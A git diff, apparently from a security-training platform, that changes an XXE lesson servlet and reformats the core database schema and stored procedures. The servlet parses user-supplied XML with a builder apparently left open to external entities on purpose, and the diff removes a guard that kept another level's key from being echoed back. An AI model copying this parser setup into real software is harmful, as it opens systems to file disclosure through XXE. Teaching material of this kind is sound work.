diff --git a/src/main/java/servlets/module/lesson/XxeLesson.java b/src/main/java/servlets/module/lesson/XxeLesson.java
index bd7008ffe..c16a40e95 100644
--- a/src/main/java/servlets/module/lesson/XxeLesson.java
+++ b/src/main/java/servlets/module/lesson/XxeLesson.java
@@ -3,6 +3,7 @@
 import dbProcs.FileInputProperties;
 import dbProcs.Getter;
 import java.io.File;
+import java.io.FileNotFoundException;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.PrintWriter;
@@ -18,7 +19,6 @@
 import org.apache.commons.io.FileUtils;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
-import org.jetbrains.annotations.Nullable;
 import org.owasp.encoder.Encode;
 import org.w3c.dom.Document;
 import org.w3c.dom.Element;
@@ -82,18 +82,18 @@ public void doPost(HttpServletRequest request, HttpServletResponse response)
               ses.getAttribute("userName").toString());
           log.debug(LEVEL_NAME + " accessed by: " + ses.getAttribute("userName").toString());
           Cookie tokenCookie = Validate.getToken(request.getCookies());
-          Object tokenHeader = request.getHeader("csrfToken");
+          Object tokenHeader = request.getHeader("csrfToken").toString();
 
           if (Validate.validateTokens(tokenCookie, tokenHeader)) {
             InputStream xml = request.getInputStream();
             String emailAddr = readXml(xml);
             log.debug("Email Addr: " + emailAddr);
 
-            String htmlOutput = "";
+            String htmlOutput = new String();
 
             if (emailAddr == null) {
               htmlOutput += "<p>" + bundle.getString("response.blank.email") + "</p>";
-              out.write(htmlOutput);
+              out.write(htmlOutput + emailAddr);
             } else if (Validate.isValidEmailAddress(emailAddr)) {
               log.debug("User Submitted - " + emailAddr);
 
@@ -105,15 +105,9 @@ public void doPost(HttpServletRequest request, HttpServletResponse response)
                       + " has been reset</p>";
               out.write(htmlOutput);
             } else {
-              // dumb way of preventing the other level from being read
-              if (emailAddr.contains("1016d6dce9f715e9eab4f3a884b3b316cfbba8fb4023c19f34c")) {
-                htmlOutput += "<p>" + bundle.getString("response.invalid.email") + "</p>";
-                out.write(htmlOutput);
-              } else {
-                htmlOutput +=
-                    "<p>" + bundle.getString("response.invalid.email") + ": " + emailAddr + "</p>";
-                out.write(htmlOutput);
-              }
+              htmlOutput +=
+                  "<p>" + bundle.getString("response.invalid.email") + ": " + emailAddr + "</p>";
+              out.write(htmlOutput);
             }
           }
         } else {
@@ -126,16 +120,15 @@ public void doPost(HttpServletRequest request, HttpServletResponse response)
       }
     } catch (Exception e) {
       out.write(errors.getString("error.funky"));
-      log.fatal(LEVEL_NAME + " - " + e);
+      log.fatal(LEVEL_NAME + " - " + e.toString());
     }
     log.debug("End of " + LEVEL_NAME + " Servlet");
   }
 
-  @Nullable
   public static String readXml(InputStream xmlEmail) {
 
     Document doc;
-    String result;
+    String result = null;
 
     DocumentBuilder dBuilder =
         XmlDocumentBuilder.xmlDocBuilder(false, true, true, true, true, true);
@@ -145,11 +138,14 @@ public static String readXml(InputStream xmlEmail) {
       doc = dBuilder.parse(is);
       Element root = doc.getDocumentElement();
       result = root.getTextContent();
-      return Encode.forHtml(result);
-    } catch (SAXException | IOException e) {
+      return Encode.forHtml(result.toString());
+    } catch (SAXException e) {
+      log.error(e.toString());
+    } catch (IOException e) {
       log.error(e.toString());
     }
-    return null;
+
+    return result;
   }
 
   /** Creates the file with the solution key needed to pass the level */
@@ -177,6 +173,10 @@ public static boolean createXxeLessonSolutionFile() {
       FileUtils.write(lessonFile, solution, "UTF-8");
       log.info("XXE Lesson Solution File " + filename + " created");
       return true;
+    } catch (FileNotFoundException e) {
+      log.error(e);
+      throw new RuntimeException(e);
+
     } catch (IOException e) {
       log.error(e);
       throw new RuntimeException(e);
diff --git a/src/main/resources/database/coreSchema.sql b/src/main/resources/database/coreSchema.sql
index edd103df6..12b74f0c1 100644
--- a/src/main/resources/database/coreSchema.sql
+++ b/src/main/resources/database/coreSchema.sql
@@ -1,190 +1,174 @@
 -- DELIMITER ;
 
-SET @OLD_UNIQUE_CHECKS = @@UNIQUE_CHECKS, UNIQUE_CHECKS = 0;
-SET @OLD_FOREIGN_KEY_CHECKS = @@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS = 0;
-SET @OLD_SQL_MODE = @@SQL_MODE, SQL_MODE = 'TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 SET NAMES utf8mb4 COLLATE utf8mb4_unicode_ci;
 
-DROP SCHEMA IF EXISTS `core`;
-CREATE SCHEMA IF NOT EXISTS `core` DEFAULT CHARACTER SET utf8mb4;
-USE `core`;
+DROP SCHEMA IF EXISTS `core` ;
+CREATE SCHEMA IF NOT EXISTS `core` DEFAULT CHARACTER SET utf8mb4 ;
+USE `core` ;
 
 SELECT "Creating Tables" FROM DUAL;
 
 -- -----------------------------------------------------
 -- Table `core`.`class`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`class`
-(
-    `classId`   VARCHAR(64) NOT NULL,
-    `className` VARCHAR(32) NOT NULL UNIQUE,
-    `classYear` VARCHAR(5)  NOT NULL,
-    PRIMARY KEY (`classId`)
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`class` (
+  `classId` VARCHAR(64) NOT NULL ,
+  `className` VARCHAR(32) NOT NULL UNIQUE,
+  `classYear` VARCHAR(5) NOT NULL ,
+  PRIMARY KEY (`classId`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`users`
-(
-    `userId`             VARCHAR(64)  NOT NULL,
-    `classId`            VARCHAR(64)  NULL,
-    `userName`           VARCHAR(32)  NOT NULL,
-    `userPass`           VARCHAR(191) NOT NULL,
-    `userRole`           VARCHAR(32)  NOT NULL,
-    `ssoName`            VARCHAR(191),
-    `badLoginCount`      INT          NOT NULL DEFAULT 0,
-    `suspendedUntil`     DATETIME     NOT NULL DEFAULT '1000-01-01 00:00:00',
-    `userAddress`        VARCHAR(128) NULL,
-    `loginType`          VARCHAR(32)  NULL,
-    `tempPassword`       TINYINT(1)   NULL     DEFAULT FALSE,
-    `tempUsername`       TINYINT(1)   NULL     DEFAULT FALSE,
-    `userScore`          INT          NOT NULL DEFAULT 0,
-    `goldMedalCount`     INT          NOT NULL DEFAULT 0,
-    `silverMedalCount`   INT          NOT NULL DEFAULT 0,
-    `bronzeMedalCount`   INT          NOT NULL DEFAULT 0,
-    `badSubmissionCount` INT          NOT NULL DEFAULT 0,
-    PRIMARY KEY (`userId`),
-    INDEX `classId` (`classId` ASC),
-    UNIQUE INDEX `userName_UNIQUE` (`userName` ASC),
-    UNIQUE INDEX `ssoName_UNIQUE` (`ssoName` ASC),
-    CONSTRAINT `classId`
-        FOREIGN KEY (`classId`)
-            REFERENCES `core`.`class` (`classId`)
-            ON DELETE CASCADE
-            ON UPDATE CASCADE
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`users` (
+  `userId` VARCHAR(64) NOT NULL ,
+  `classId` VARCHAR(64) NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPass` VARCHAR(191) NOT NULL ,
+  `userRole` VARCHAR(32) NOT NULL ,
+  `ssoName` VARCHAR(191) ,
+  `badLoginCount` INT NOT NULL DEFAULT 0 ,
+  `suspendedUntil` DATETIME NOT NULL DEFAULT '1000-01-01 00:00:00' ,
+  `userAddress` VARCHAR(128) NULL ,
+  `loginType` VARCHAR(32) NULL ,
+  `tempPassword` TINYINT(1)  NULL DEFAULT FALSE ,
+  `tempUsername` TINYINT(1)  NULL DEFAULT FALSE ,
+  `userScore` INT NOT NULL DEFAULT 0 ,
+  `goldMedalCount` INT NOT NULL DEFAULT 0 ,
+  `silverMedalCount` INT NOT NULL DEFAULT 0 ,
+  `bronzeMedalCount` INT NOT NULL DEFAULT 0 ,
+  `badSubmissionCount` INT NOT NULL DEFAULT 0,
+  PRIMARY KEY (`userId`) ,
+  INDEX `classId` (`classId` ASC) ,
+  UNIQUE INDEX `userName_UNIQUE` (`userName` ASC) ,
+  UNIQUE INDEX `ssoName_UNIQUE` (`ssoName` ASC) ,
+  CONSTRAINT `classId`
+    FOREIGN KEY (`classId` )
+    REFERENCES `core`.`class` (`classId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`modules`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`modules`
-(
-    `moduleId`                  VARCHAR(64)  NOT NULL,
-    `moduleName`                VARCHAR(64)  NOT NULL,
-    `moduleNameLangPointer`     VARCHAR(64)  NOT NULL UNIQUE,
-    `moduleType`                VARCHAR(16)  NOT NULL,
-    `moduleCategory`            VARCHAR(64)  NULL,
-    `moduleCategoryLangPointer` VARCHAR(64)  NULL,
-    `moduleResult`              VARCHAR(191) NULL,
-    `moduleHash`                VARCHAR(191) NULL UNIQUE,
-    `moduleStatus`              VARCHAR(16)  NULL     DEFAULT 'open',
-    `incrementalRank`           INT          NULL     DEFAULT 200,
-    `scoreValue`                INT          NOT NULL DEFAULT 50,
-    `hardcodedKey`              TINYINT(1)   NOT NULL DEFAULT TRUE,
-    `isUnsafe`                  TINYINT(1)   NOT NULL DEFAULT TRUE,
-    PRIMARY KEY (`moduleId`)
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`modules` (
+  `moduleId` VARCHAR(64) NOT NULL ,
+  `moduleName` VARCHAR(64) NOT NULL ,
+  `moduleNameLangPointer` VARCHAR(64) NOT NULL UNIQUE,
+  `moduleType` VARCHAR(16) NOT NULL ,
+  `moduleCategory` VARCHAR(64) NULL ,
+  `moduleCategoryLangPointer` VARCHAR(64) NULL ,
+  `moduleResult` VARCHAR(191) NULL ,
+  `moduleHash` VARCHAR(191) NULL UNIQUE,
+  `moduleStatus` VARCHAR(16) NULL DEFAULT 'open' ,
+  `incrementalRank` INT NULL DEFAULT 200,
+  `scoreValue` INT NOT NULL DEFAULT 50 ,
+  `hardcodedKey` TINYINT(1) NOT NULL DEFAULT TRUE,
+  `isUnsafe`  TINYINT(1) NOT NULL DEFAULT TRUE,
+  PRIMARY KEY (`moduleId`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`medals`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`medals`
-(
-    `medalId`              INT         NOT NULL AUTO_INCREMENT,
-    `classId`              VARCHAR(64) NULL,
-    `moduleId`             VARCHAR(64) NOT NULL,
-    `scoreBonus`           INT         NOT NULL DEFAULT 5,
-    `goldMedalAvailable`   TINYINT(1)  NOT NULL DEFAULT TRUE,
-    `silverMedalAvailable` TINYINT(1)  NOT NULL DEFAULT TRUE,
-    `bronzeMedalAvailable` TINYINT(1)  NOT NULL DEFAULT TRUE,
-    PRIMARY KEY (`medalId`),
-    INDEX `fk_Medals_Modules1` (`moduleId` ASC),
-    CONSTRAINT `fk_Medals_Class1`
-        FOREIGN KEY (`classId`)
-            REFERENCES `core`.`class` (`classId`)
-            ON DELETE NO ACTION
-            ON UPDATE NO ACTION,
-    CONSTRAINT `fk_Medals_Modules1`
-        FOREIGN KEY (`moduleId`)
-            REFERENCES `core`.`modules` (`moduleId`)
-            ON DELETE CASCADE
-            ON UPDATE CASCADE
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE TABLE IF NOT EXISTS `core`.`medals` (
+  `medalId` INT NOT NULL AUTO_INCREMENT,
+  `classId` VARCHAR(64) NULL,
+  `moduleId` VARCHAR(64) NOT NULL,
+  `scoreBonus` INT NOT NULL DEFAULT 5 ,
+  `goldMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+  `silverMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+  `bronzeMedalAvailable` TINYINT(1) NOT NULL DEFAULT TRUE,
+  PRIMARY KEY (`medalId`) ,
+  INDEX `fk_Medals_Modules1` (`moduleId` ASC) ,
+  CONSTRAINT `fk_Medals_Class1`
+    FOREIGN KEY (`classId` )
+    REFERENCES `core`.`class` (`classId` )
+    ON DELETE NO ACTION
+    ON UPDATE NO ACTION,
+  CONSTRAINT `fk_Medals_Modules1`
+    FOREIGN KEY (`moduleId` )
+    REFERENCES `core`.`modules` (`moduleId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`results`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`results`
-(
-    `userId`           VARCHAR(64) NOT NULL,
-    `moduleId`         VARCHAR(64) NOT NULL,
-    `startTime`        DATETIME    NOT NULL,
-    `finishTime`       DATETIME    NULL,
-    `csrfCount`        INT         NULL DEFAULT 0,
-    `resultSubmission` LONGTEXT    NULL,
-    `knowledgeBefore`  INT         NULL,
-    `knowledgeAfter`   INT         NULL,
-    `difficulty`       INT         NULL,
-    `scored`           INT         NULL,
-    `medalEarned`      VARCHAR(32),
-    PRIMARY KEY (`userId`, `moduleId`),
-    INDEX `fk_Results_Modules1` (`moduleId` ASC),
-    CONSTRAINT `fk_Results_users1`
-        FOREIGN KEY (`userId`)
-            REFERENCES `core`.`users` (`userId`)
-            ON DELETE NO ACTION
-            ON UPDATE NO ACTION,
-    CONSTRAINT `fk_Results_Modules1`
-        FOREIGN KEY (`moduleId`)
-            REFERENCES `core`.`modules` (`moduleId`)
-            ON DELETE CASCADE
-            ON UPDATE CASCADE
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`results` (
+  `userId` VARCHAR(64) NOT NULL ,
+  `moduleId` VARCHAR(64) NOT NULL ,
+  `startTime` DATETIME NOT NULL ,
+  `finishTime` DATETIME NULL ,
+  `csrfCount` INT NULL DEFAULT 0 ,
+  `resultSubmission` LONGTEXT NULL ,
+  `knowledgeBefore` INT NULL ,
+  `knowledgeAfter` INT NULL ,
+  `difficulty` INT NULL ,
+  `scored` INT NULL,
+  `medalEarned` VARCHAR(32),
+  PRIMARY KEY (`userId`, `moduleId`) ,
+  INDEX `fk_Results_Modules1` (`moduleId` ASC) ,
+  CONSTRAINT `fk_Results_users1`
+    FOREIGN KEY (`userId` )
+    REFERENCES `core`.`users` (`userId` )
+    ON DELETE NO ACTION
+    ON UPDATE NO ACTION,
+  CONSTRAINT `fk_Results_Modules1`
+    FOREIGN KEY (`moduleId` )
+    REFERENCES `core`.`modules` (`moduleId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`cheatsheet`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`cheatsheet`
-(
-    `cheatSheetId` VARCHAR(64) NOT NULL,
-    `moduleId`     VARCHAR(64) NOT NULL,
-    `createDate`   DATETIME    NOT NULL,
-    `solution`     LONGTEXT    NOT NULL,
-    PRIMARY KEY (`cheatSheetId`, `moduleId`),
-    INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC),
-    CONSTRAINT `fk_CheatSheet_Modules1`
-        FOREIGN KEY (`moduleId`)
-            REFERENCES `core`.`modules` (`moduleId`)
-            ON DELETE CASCADE
-            ON UPDATE CASCADE
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`cheatsheet` (
+  `cheatSheetId` VARCHAR(64) NOT NULL ,
+  `moduleId` VARCHAR(64) NOT NULL ,
+  `createDate` DATETIME NOT NULL ,
+  `solution` LONGTEXT NOT NULL ,
+  PRIMARY KEY (`cheatSheetId`, `moduleId`) ,
+  INDEX `fk_CheatSheet_Modules1` (`moduleId` ASC) ,
+  CONSTRAINT `fk_CheatSheet_Modules1`
+    FOREIGN KEY (`moduleId` )
+    REFERENCES `core`.`modules` (`moduleId` )
+    ON DELETE CASCADE
+    ON UPDATE CASCADE)
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`sequence`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`sequence`
-(
-    `tableName` VARCHAR(32) NOT NULL,
-    `currVal`   BIGINT(20)  NOT NULL DEFAULT 282475249,
-    PRIMARY KEY (`tableName`)
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`sequence` (
+  `tableName` VARCHAR(32) NOT NULL ,
+  `currVal` BIGINT(20) NOT NULL DEFAULT 282475249 ,
+  PRIMARY KEY (`tableName`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 -- -----------------------------------------------------
 -- Table `core`.`settings`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `core`.`settings`
-(
-    `setting` VARCHAR(64) NOT NULL,
-    `value`   VARCHAR(64) NOT NULL,
-    PRIMARY KEY (`setting`)
-)
-    ENGINE = InnoDB
-    DEFAULT CHARACTER SET = utf8mb4;
+CREATE  TABLE IF NOT EXISTS `core`.`settings` (
+  `setting` VARCHAR(64) NOT NULL ,
+  `value` VARCHAR(64) NOT NULL ,
+  PRIMARY KEY (`setting`) )
+ENGINE = InnoDB
+DEFAULT CHARACTER SET = utf8mb4;
 
 SELECT "Creating Procedures" FROM DUAL;
 
@@ -194,60 +178,57 @@ SELECT "Creating Procedures" FROM DUAL;
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userLock`(theName VARCHAR(32))
+CREATE PROCEDURE `core`.`userLock` (theName VARCHAR(32))
 BEGIN
-    DECLARE theDate DATETIME;
-    DECLARE untilDate DATETIME;
-    DECLARE theCount INT;
+DECLARE theDate DATETIME;
+DECLARE untilDate DATETIME;
+DECLARE theCount INT;
 
-    COMMIT;
-    SELECT NOW() FROM DUAL INTO theDate;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
 -- Get the badLoginCount from users if they are not suspended already or account has attempted a login within the last 10 mins
-    SELECT badLoginCount
-    FROM `users`
+SELECT badLoginCount FROM `users`
     WHERE userName = theName
-      AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
+    AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
     INTO theCount;
 
-    SELECT suspendedUntil
-    FROM `users`
+SELECT suspendedUntil FROM `users`
     WHERE userName = theName
-      AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
+    AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
     INTO untilDate;
-    IF (untilDate < theDate) THEN
-        IF (theCount >= 3) THEN
-            -- Set suspended until 30 mins from now
-            UPDATE `users`
-            SET suspendedUntil = TIMESTAMPADD(MINUTE, 30, theDate),
-                badLoginCount  = 0
+IF (untilDate < theDate) THEN
+    IF (theCount >= 3) THEN
+        -- Set suspended until 30 mins from now
+        UPDATE `users` SET
+            suspendedUntil = TIMESTAMPADD(MINUTE, 30, theDate),
+            badLoginCount = 0
             WHERE userName = theName;
-            COMMIT;
-            -- ELSE the user is already suspended, or theCount < 3
-        ELSE
-            -- Get user where their last bad login was within 10 mins ago
-            SELECT COUNT(userId)
-            FROM users
+        COMMIT;
+    -- ELSE the user is already suspended, or theCount < 3
+    ELSE
+        -- Get user where their last bad login was within 10 mins ago
+        SELECT COUNT(userId) FROM users
             WHERE userName = theName
-              AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
+            AND suspendedUntil < (theDate - '0000-00-00 00:10:00')
             INTO theCount;
 
-            -- IF a user was counted then they are not suspended, but have attemped a bad login within 10 mins of their last
-            IF (theCount > 0) THEN
-                UPDATE `users`
-                SET badLoginCount  = (badLoginCount + 1),
-                    suspendedUntil = theDate
+        -- IF a user was counted then they are not suspended, but have attemped a bad login within 10 mins of their last
+        IF (theCount > 0) THEN
+            UPDATE `users` SET
+                badLoginCount = (badLoginCount + 1),
+                suspendedUntil = theDate
                 WHERE userName = theName;
-                COMMIT;
-                -- ELSE this is the first time within 10 mins that this account has logged in bad
-            ELSE
-                UPDATE `users`
-                SET badLoginCount  = 1,
-                    suspendedUntil = theDate
+            COMMIT;
+        -- ELSE this is the first time within 10 mins that this account has logged in bad
+        ELSE
+            UPDATE `users` SET
+                badLoginCount = 1,
+                suspendedUntil = theDate
                 WHERE userName = theName;
-                COMMIT;
-            END IF;
+            COMMIT;
         END IF;
     END IF;
+END IF;
 END
 
 -- $$
@@ -260,15 +241,15 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`suspendUser`(theId VARCHAR(64), theMins INT)
+CREATE PROCEDURE `core`.`suspendUser` (theId VARCHAR(64), theMins INT)
 BEGIN
-    DECLARE theDate DATETIME;
-    COMMIT;
-    SELECT NOW() FROM DUAL INTO theDate;
-    UPDATE `users`
-    SET suspendedUntil = TIMESTAMPADD(MINUTE, theMins, theDate)
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE `users` SET
+    suspendedUntil = TIMESTAMPADD(MINUTE, theMins, theDate)
     WHERE userId = theId;
-    COMMIT;
+COMMIT;
 END
 
 -- $$
@@ -281,15 +262,15 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`unSuspendUser`(theId VARCHAR(64))
+CREATE PROCEDURE `core`.`unSuspendUser` (theId VARCHAR(64))
 BEGIN
-    DECLARE theDate DATETIME;
-    COMMIT;
-    SELECT NOW() FROM DUAL INTO theDate;
-    UPDATE `users`
-    SET suspendedUntil = theDate
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE `users` SET
+    suspendedUntil = theDate
     WHERE userId = theId;
-    COMMIT;
+COMMIT;
 END
 
 -- $$
@@ -302,11 +283,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userFind`(IN theName VARCHAR(32))
+CREATE PROCEDURE `core`.`userFind` (IN theName VARCHAR(32))
 BEGIN
-    COMMIT;
-    SELECT userName, suspendedUntil
-    FROM `users`
+COMMIT;
+SELECT userName, suspendedUntil FROM `users`
     WHERE userName = theName;
 END
 
@@ -319,12 +299,11 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`playerCount`()
+CREATE PROCEDURE `core`.`playerCount` ()
 BEGIN
     COMMIT;
-    SELECT count(userId)
-    FROM users
-    WHERE userRole = 'player';
+    SELECT count(userId) FROM users
+        WHERE userRole = 'player';
 END
 
 
@@ -337,10 +316,7 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userCreate`(IN theClassId VARCHAR(64), IN theUserName VARCHAR(32), IN theUserPass VARCHAR(191),
-                                     IN theUserRole VARCHAR(32), IN theSSOName VARCHAR(32),
-                                     IN theUserAddress VARCHAR(128), IN theLoginType VARCHAR(32),
-                                     theTempPassword BOOLEAN, theTempUsername BOOLEAN)
+CREATE PROCEDURE `core`.`userCreate` (IN theClassId VARCHAR(64), IN theUserName VARCHAR(32), IN theUserPass VARCHAR(191), IN theUserRole VARCHAR(32), IN theSSOName VARCHAR(32), IN theUserAddress VARCHAR(128), IN theLoginType VARCHAR(32), theTempPassword BOOLEAN, theTempUsername BOOLEAN)
 BEGIN
     DECLARE theId VARCHAR(64);
     DECLARE theClassCount INT;
@@ -351,37 +327,37 @@ BEGIN
     -- If (Valid User Type) AND (classId = null or (Valid Class Id)) Then create user
     IF (theUserRole = 'player' OR theUserRole = 'admin') THEN
         IF (theClassId != null) THEN
-            SELECT count(classId)
-            FROM class
-            WHERE classId = theClassId
-            INTO theClassCount;
+            SELECT count(classId) FROM class
+                WHERE classId = theClassId
+                INTO theClassCount;
             IF (theClassCount != 1) THEN
                 SELECT null FROM DUAL INTO theClassId;
             END IF;
         END IF;
 
         -- Increment sequence for users table
-        UPDATE sequence
-        SET currVal = currVal + 1
-        WHERE tableName = 'users';
+        UPDATE sequence SET
+            currVal = currVal + 1
+            WHERE tableName = 'users';
         COMMIT;
-        SELECT SHA(CONCAT(currVal, tableName, theDate))
-        FROM sequence
-        WHERE tableName = 'users'
-        INTO theId;
+        SELECT SHA(CONCAT(currVal, tableName, theDate)) FROM sequence
+            WHERE tableName = 'users'
+            INTO theId;
 
         -- Insert the values, badLoginCount and suspendedUntil Values will use the defaults defined by the table
-        INSERT INTO users (userId,
-                           classId,
-                           userName,
-                           userPass,
-                           userRole,
-                           ssoName,
-                           userAddress,
-                           loginType,
-                           tempPassword,
-                           tempUsername)
-        VALUES (theId,
+        INSERT INTO users (
+                userId,
+                classId,
+                userName,
+                userPass,
+                userRole,
+                ssoName,
+                userAddress,
+                loginType,
+                tempPassword,
+                tempUsername
+            ) VALUES (
+                theId,
                 theClassId,
                 theUserName,
                 theUserPass,
@@ -390,7 +366,8 @@ BEGIN
                 theUserAddress,
                 theLoginType,
                 theTempPassword,
-                theTempUsername);
+                theTempUsername
+            );
         COMMIT;
         SELECT null FROM DUAL;
     ELSE
@@ -407,12 +384,12 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userBadLoginReset`(IN theUserId VARCHAR(45))
+CREATE PROCEDURE `core`.`userBadLoginReset` (IN theUserId VARCHAR(45))
 BEGIN
     COMMIT;
-    UPDATE users
-    SET badLoginCount = 0
-    WHERE userId = theUserId;
+    UPDATE users SET
+        badLoginCount = 0
+        WHERE userId = theUserId;
     COMMIT;
 END
 
@@ -425,17 +402,17 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userPasswordChange`(IN theUserName VARCHAR(32), IN newHash VARCHAR(191))
+CREATE PROCEDURE `core`.`userPasswordChange` (IN theUserName VARCHAR(32), IN newHash VARCHAR(191))
 BEGIN
-    DECLARE theDate DATETIME;
-    COMMIT;
-    SELECT NOW() FROM DUAL INTO theDate;
-    UPDATE users
-    SET userPass     = newHash,
-        tempPassword = FALSE
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE users SET
+    userPass = newHash,
+    tempPassword = FALSE
     WHERE userName = theUserName
-      AND suspendedUntil < theDate;
-    COMMIT;
+    AND suspendedUntil < theDate;
+COMMIT;
 END
 
 -- $$
@@ -447,16 +424,16 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`userPasswordChangeAdmin`(IN theUserId VARCHAR(64), IN newHash VARCHAR(191))
+CREATE PROCEDURE `core`.`userPasswordChangeAdmin` (IN theUserId VARCHAR(64), IN newHash VARCHAR(191))
 BEGIN
-    DECLARE theDate DATETIME;
-    COMMIT;
-    SELECT NOW() FROM DUAL INTO theDate;
-    UPDATE users
-    SET userPass     = newHash,
-        tempPassword = TRUE
+DECLARE theDate DATETIME;
+COMMIT;
+SELECT NOW() FROM DUAL INTO theDate;
+UPDATE users SET
+    userPass = newHash,
+    tempPassword = TRUE
     WHERE userId = theUserId;
-    COMMIT;
+COMMIT;
 END
 
 -- $$
@@ -468,18 +445,17 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`classCreate`(IN theClassName VARCHAR(32), IN theClassYear VARCHAR(5))
+CREATE PROCEDURE `core`.`classCreate` (IN theClassName VARCHAR(32), IN theClassYear VARCHAR(5))
 BEGIN
     DECLARE theId VARCHAR(64);
     COMMIT;
-    UPDATE sequence
-    SET currVal = currVal + 1
-    WHERE tableName = 'users';
+    UPDATE sequence SET
+        currVal = currVal + 1
+        WHERE tableName = 'users';
     COMMIT;
-    SELECT SHA(CONCAT(currVal, tableName))
-    FROM sequence
-    WHERE tableName = 'users'
-    INTO theId;
+    SELECT SHA(CONCAT(currVal, tableName)) FROM sequence
+        WHERE tableName = 'users'
+        INTO theId;
     INSERT INTO class VALUES (theId, theClassName, theClassYear);
 END
 
@@ -492,7 +468,7 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`classCount`()
+CREATE PROCEDURE `core`.`classCount` ()
 BEGIN
     SELECT count(ClassId) FROM class;
 END
@@ -506,7 +482,7 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`classesGetData`()
+CREATE PROCEDURE `core`.`classesGetData` ()
 BEGIN
     SELECT classId, className, classYear FROM class;
 END
@@ -520,11 +496,10 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`classFind`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`classFind` (IN theClassId VARCHAR(64))
 BEGIN
-    SELECT className, classYear
-    FROM class
-    WHERE classId = theClassId;
+    SELECT className, classYear FROM class
+        WHERE classId = theClassId;
 END
 
 -- $$
@@ -536,14 +511,13 @@ END
 
 USE `core`;
 -- DELIMITER $$
-CREATE PROCEDURE `core`.`playersByClass`(IN theClassId VARCHAR(64))
+CREATE PROCEDURE `core`.`playersByClass` (IN theClassId VARCHAR(64))
 BEGIN
     COMMIT;
-    SELECT userId, userName, userAddress
-    FROM users
